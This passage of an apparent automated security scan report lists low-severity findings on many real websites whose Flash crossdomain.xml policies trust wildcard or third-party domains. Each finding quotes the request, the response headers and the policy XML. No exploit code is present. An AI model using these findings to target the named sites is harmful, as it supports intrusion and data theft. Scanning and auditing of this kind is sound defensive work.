Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gather.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:05 GMT
Server: Apache/2.2.3 (Unix) mod_jk/1.2.28
Last-Modified: Tue, 01 Mar 2011 17:46:40 GMT
ETag: "2f82e6-163-49d6f60ee4000"
Accept-Ranges: bytes
Content-Length: 355
Keep-Alive: timeout=5, max=100
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.quantserve.com"/>
<allow-access-from domain="*.gather.com"/>
<allow-access-from domain="*.aetna.com"/>
<allow-access-from domain="*.intelihealth.com"/>
...[SNIP]...
7.276. http://www.geico.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.geico.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.geico.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Type: application/xml; charset=UTF-8
Expires: Sat, 02 Apr 2011 13:35:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:35:16 GMT
Content-Length: 357
Connection: close
Set-Cookie: SaneID=ED8637E93A1DC1F1; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.geico.com

<?xml version="1.0" encoding="utf-8"?>
       

    <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
       

    <cross-domain-policy>
       

    <allow-access-from domain="*.geico.com" />
    <allow-access-from domain="geico.com" />
...[SNIP]...
7.277. http://www.gifts.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gifts.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gifts.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:31 GMT
Server: Apache
Set-Cookie: JSESSIONID=39A4FA7D4576C4CD8A488BAD83A9F6A8; Path=/
Content-Language: en-US
Content-Length: 227
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: SERVERID=web01; path=/
Cache-control: private

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.gifts.com" secure="false" />
...[SNIP]...
7.278. http://www.godaddy.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.godaddy.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 02 Apr 2011 12:39:00 GMT
Connection: close
Content-Length: 150

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.wsimg.com" /><allow-access-from domain="*.godaddy.com" /></cross-domain-policy>
7.279. http://www.goodreads.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.goodreads.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.goodreads.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Sat, 02 Apr 2011 13:41:28 GMT
Content-Type: text/xml
Content-Length: 307
Last-Modified: Thu, 31 Mar 2011 23:27:03 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!-- http://www.adobe.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.polaritylabs.com"/>
<allow-access-from domain="polaritylabs.com"/>
<allow-access-from domain="*.goodreads.com"/>
<allow-access-from domain="goodreads.com"/>
...[SNIP]...
7.280. http://www.guardian.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.guardian.co.uk

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:59 GMT
Server: Apache
Set-Cookie: GU_MU=VFpjbFR3cjZERTRBQUI2bHNlOEFBQURwfHVpTlFhT1BjZy9mWkVDalBsYXBVOEE9PQ==; path=/; domain=.guardian.co.uk; expires=Tue, 30-Mar-2021 13:31:59 GMT
Set-Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDI0OTY5MTM0MjAxODkzODYyNzI3NTIyMTQwMTk0MTgzMTk1MjAyNDQ=; path=/; domain=.guardian.co.uk; expires=Sat, 23-Apr-2011 13:31:59 GMT
Last-Modified: Thu, 01 Apr 2010 16:14:58 GMT
Accept-Ranges: bytes
Content-Length: 1353
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:31:59 GMT
X-GU-httpd: 05
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<!-- why are we doing this? See here: ht
...[SNIP]...
<allow-access-from domain="*.bs.preview.serving-sys.com"/>
<allow-access-from domain="199.106.209.225"/>
<allow-access-from domain="*.ds.serving-sys.com"/>
<allow-access-from domain="199.106.209.197"/>
<allow-access-from domain="*.bs.serving-sys.com"/>
<allow-access-from domain="80.252.91.41"/>
<allow-access-from domain="*.eyeblasterwiz.com"/>
<allow-access-from domain="199.106.209.196"/>
<allow-access-from domain="*.ebsearch.eyeblasterwiz.com"/>
<allow-access-from domain="62.249.238.93"/>
<allow-access-from domain="*.serving-sys.com"/>
<allow-access-from domain="web2.dreamleague.co.uk"/>
<allow-access-from domain="fantasyfootball.guardian.co.uk"/>
<allow-access-from domain="*.jumpmediagroup.com"/>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="adimage.guardian.co.uk"/>
<allow-access-from domain="static.guim.co.uk"/>
<allow-access-from domain="*.gnl" />
...[SNIP]...
7.281. http://www.hallmark.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hallmark.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hallmark.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Fri, 25 Mar 2011 07:08:26 GMT
Accept-Ranges: bytes
ETag: "88bea06fbbeacb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
WEBHOST: CW128
Content-Length: 535
Cache-Control: no-cache
Date: Sat, 02 Apr 2011 14:14:54 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="www.hallmark.com"/>
   <allow-access-from domain="*.hmkb2c.com"/>
   <allow-access-from domain="*.hallmark.com"/>
   <allow-access-from domain="digitalassets.hallmark.com"/>
   <allow-access-from domain="digitaltransfer.hallmark.com"/>
   <allow-access-from domain="*.hmkdev.com"/>
   <allow-access-from domain="*.alvenda.com"/>
   <allow-access-from domain="*.alvenda.net"/>
   <allow-access-from domain="*.akamai.net"/>
<allow-access-from domain="67.199.75.155"/>
...[SNIP]...
7.282. http://www.hbo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hbo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hbo.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:15:40 GMT
Server: Apache
Last-Modified: Wed, 26 Jan 2011 20:20:12 GMT
ETag: "6a0-41b-49ac58f677700"
Accept-Ranges: bytes
Content-Length: 1051
Cache-Control: max-age=60
Expires: Sat, 02 Apr 2011 14:16:40 GMT
g: u
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE
cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="hbo.com" />
<allow-access-from domain="*.hbo.com" />
<allow-access-from domain="*.cdn.hbo.com" />
<allow-access-from domain="*.homebox.com" />
<allow-access-from domain="*.homeboxoffice.com" />
<allow-access-from domain="localhost" />
<allow-access-from domain="127.0.0.1" />
<allow-access-from domain="*.sprodhbo.homebox.com" />
<allow-access-from domain="myspacecdn.com" />
<allow-access-from domain="*.myspacecdn.com" />
<allow-access-from domain="*.myspace.com" />
<allow-access-from domain="myspace.com" />
<allow-access-from domain="*.gmodules.com" />
<allow-access-from domain="gmodules.com" />
<allow-access-from domain="farm.sproutbuilder.com"/>
<allow-access-from domain="*.facebook.com" />
<allow-access-from domain="facebook.com" />
...[SNIP]...
7.283. http://www.healthcentral.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.healthcentral.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.healthcentral.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CUR CONi OUR DELi SAMi OTRi STP STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Accept-Ranges: bytes
Last-Modified: Wed, 14 Oct 2009 16:46:43 GMT
ETag: "1CA4CEDE8CA1B80:1CBF07678218642"
Content-Type: text/xml
Content-Length: 362
Cache-Control: public, max-age=1555
Expires: Sat, 02 Apr 2011 14:09:52 GMT
Date: Sat, 02 Apr 2011 13:43:57 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.washingtonpost.com" />
<allow-access-from domain="*.choicemedia.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.healthcentral.com" secure="false" />
...[SNIP]...
7.284. http://www.hgtv.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hgtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hgtv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 15 Jul 2010 03:51:40 GMT
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:45:24 GMT
Content-Length: 1200
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.hgtvpro.com"/>
<allow-access-from domain="*.hgtv.com"/>
<allow-access-from domain="*.diynetwork.com"/>
<allow-access-from domain="*.diynet.com"/>
<allow-access-from domain="*.fineliving.com"/>
<allow-access-from domain="*.food.com"/>
<allow-access-from domain="*.foodnetwork.com"/>
<allow-access-from domain="*.gactv.com"/>
<allow-access-from domain="*.ecologue.com"/>
<allow-access-from domain="*.scripps.com"/>
<allow-access-from domain="*.scrippsonline.com"/>
<allow-access-from domain="*.hottrends2005.com"/>
<allow-access-from domain="*.hottrends2006.com"/>
<allow-access-from domain="*.scrippsnetworks.com"/>
<allow-access-from domain="72.3.226.28" />
<allow-access-from domain="64.225.232.166" />
<allow-access-from domain="*.videomment.com" />
<allow-access-from domain="*.widgets.isg-marketing.com" />
<allow-access-from domain="*.videomerce.com"/>
<allow-access-from domain="*.5Min.com"/>
<allow-access-from domain="*.sndimg.com"/>
...[SNIP]...
7.285. http://www.hhs.gov/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hhs.gov
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hhs.gov

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/xml; charset=UTF-8
Last-Modified: Tue, 21 Jul 2009 14:44:48 GMT
Content-Length: 230
ETag: "e6-4a65d460"
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 14:20:09 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...
7.286. http://www.hi5.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hi5.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hi5.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"414-1286911046000"
Last-Modified: Tue, 12 Oct 2010 19:17:26 GMT
Content-Type: application/xml
Content-Length: 414
Date: Sat, 02 Apr 2011 13:34:02 GMT
Connection: keep-alive
Set-Cookie: NSC_bqq-tfswfst-ofxvj=e246b2193660;expires=Sat, 02-Apr-11 14:16:47 GMT;path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.mysite.com -->
<cross-domain-policy>
<allow-access-from domain="*.hi5.com" />
<allow-access-from domain="hi5.com" />
<allow-access-from domain="x.mochiads.com" />
<allow-access-from domain="*.socialmoraygames.com"/>
...[SNIP]...
7.287. http://www.history.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.history.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.history.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.11 (Unix)
Last-Modified: Mon, 21 Mar 2011 16:37:50 GMT
ETag: "1720927-d1-49f00bf96f380"
Accept-Ranges: bytes
Content-Length: 209
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:44:47 GMT
Connection: close
X-N: S

<?xml version="1.0"?>
<!-- http://www.adobe.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="*.h9story.com" />
   <allow-access-from domain="*.history.com" />
</cross-domai
...[SNIP]...
7.288. http://www.hollywood.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hollywood.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hollywood.com

Response

HTTP/1.1 200 OK
Content-Length: 354
Content-Type: text/xml
Last-Modified: Thu, 22 Apr 2010 18:33:10 GMT
Accept-Ranges: bytes
ETag: "07739424ae2ca1:8d9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:32:57 GMT
Connection: close

<?xml version="1.0" ?>
<!-- http://www.adobe.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="*.hollywood.com" />
   <allow-access-from domain="*.brightcove.com" />
   <!-- f
...[SNIP]...
<allow-access-from domain="*.cooliris.com" />
...[SNIP]...
7.289. http://www.hollywoodlife.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hollywoodlife.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hollywoodlife.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Last-Modified: Mon, 12 Apr 2010 23:01:21 GMT
Server: nginx/0.7.62
Content-Length: 267
Expires: Sat, 02 Apr 2011 13:54:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:54:08 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.vimg.net" />
<allow-access-from domain="*.hollywoodlife.com" />
...[SNIP]...
7.290. http://www.homedepot.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.homedepot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.homedepot.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Last-Modified: Thu, 16 Oct 2008 20:46:36 GMT
ETag: "1023-1c7-f1d96300"
Accept-Ranges: bytes
Content-Length: 455
Content-Type: text/xml
X-Pad: avoid browser bug
Cache-Control: max-age=37156
Date: Sat, 02 Apr 2011 13:24:42 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*.homedepot.com" />
   <allow-access-from domain="homedepot.com" />
...[SNIP]...
7.291. http://www.hp.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hp.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hp.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:35 GMT
Server: Apache
Last-Modified: Mon, 17 May 2010 11:29:38 GMT
ETag: "8a41ec80"
Accept-Ranges: bytes
Content-Length: 213
Cache-Control: max-age=7200
Expires: Sat, 02 Apr 2011 14:43:35 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.hp.com" />
</cross-dom
...[SNIP]...
7.292. http://www.hsn.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hsn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hsn.com

Response

HTTP/1.1 200 OK
Content-Length: 510
Content-Type: text/xml
Last-Modified: Wed, 23 Mar 2011 15:23:10 GMT
Accept-Ranges: bytes
ETag: "0c3ad376ee9cb1:101f"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
Set-Cookie: TLTSID=AD33F804402E8C7B2B4472BF2E21085B; domain=.hsn.com; path=/
Set-Cookie: TLTHID=AD33F804402E8C7B2B4472BF2E21085B; domain=.hsn.com; path=/
Date: Sat, 02 Apr 2011 13:35:57 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.hsn.com" />
<allow-access-from domain="*.hsnlab.com" />
<allow-access-from domain="*.hsni.com" />
<allow-access-from domain="a1995.g.akamai.net"/>
<allow-access-from domain="a1995.b.akamai.net"/>
<allow-access-from domain="a248.e.akamai.net"/>
<allow-access-from domain="*.clipsync.com"/>
...[SNIP]...
7.293. http://www.hulu.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hulu.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hulu.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 24 Mar 2011 16:34:41 GMT
Server: nginx
Content-Type: text/xml
Content-Length: 347
Accept-Ranges: bytes
Cache-Control: max-age=547174
Expires: Fri, 08 Apr 2011 20:37:25 GMT
Date: Sat, 02 Apr 2011 12:37:51 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.hulu.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.tivo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...
7.294. http://www.ichotelsgroup.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ichotelsgroup.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ichotelsgroup.com

Response

HTTP/1.0 200 OK
Server: Apache/1.3.41 (Unix) Communique/4.0.4 mod_ssl/2.8.31 OpenSSL/0.9.8a
Content-Type: text/xml
P3P: CP="OTI DSP COR DEVa OUR NOR",policyref="http://dcs.ichotelsgroup.com/w3c/p3p.xml"
Last-Modified: Fri, 09 May 2008 23:45:44 GMT
ETag: "e5e5-10c-4824e228"
Accept-Ranges: bytes
Content-Length: 268
Expires: Sat, 02 Apr 2011 13:37:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:37:25 GMT
Connection: close
Set-Cookie: TLTSID=588654C85D2E105D09BCB05B6929DBA8; Path=/; Domain=.ichotelsgroup.com
Set-Cookie: TLTUID=588654C85D2E105D09BCB05B6929DBA8; Path=/; Domain=.ichotelsgroup.com; expires=Sat, 02-04-2021 13:37:25 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.intercontinental.com"/>
<allow-access-from domain="*.ichotelsgroup.com"/>
...[SNIP]...
7.295. http://www.ikea.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ikea.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ikea.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Thu, 04 Nov 2010 08:01:26 GMT
ETag: "cfc07-a11-908a4180"
Accept-Ranges: bytes
Content-Length: 2577
Content-Type: text/xml
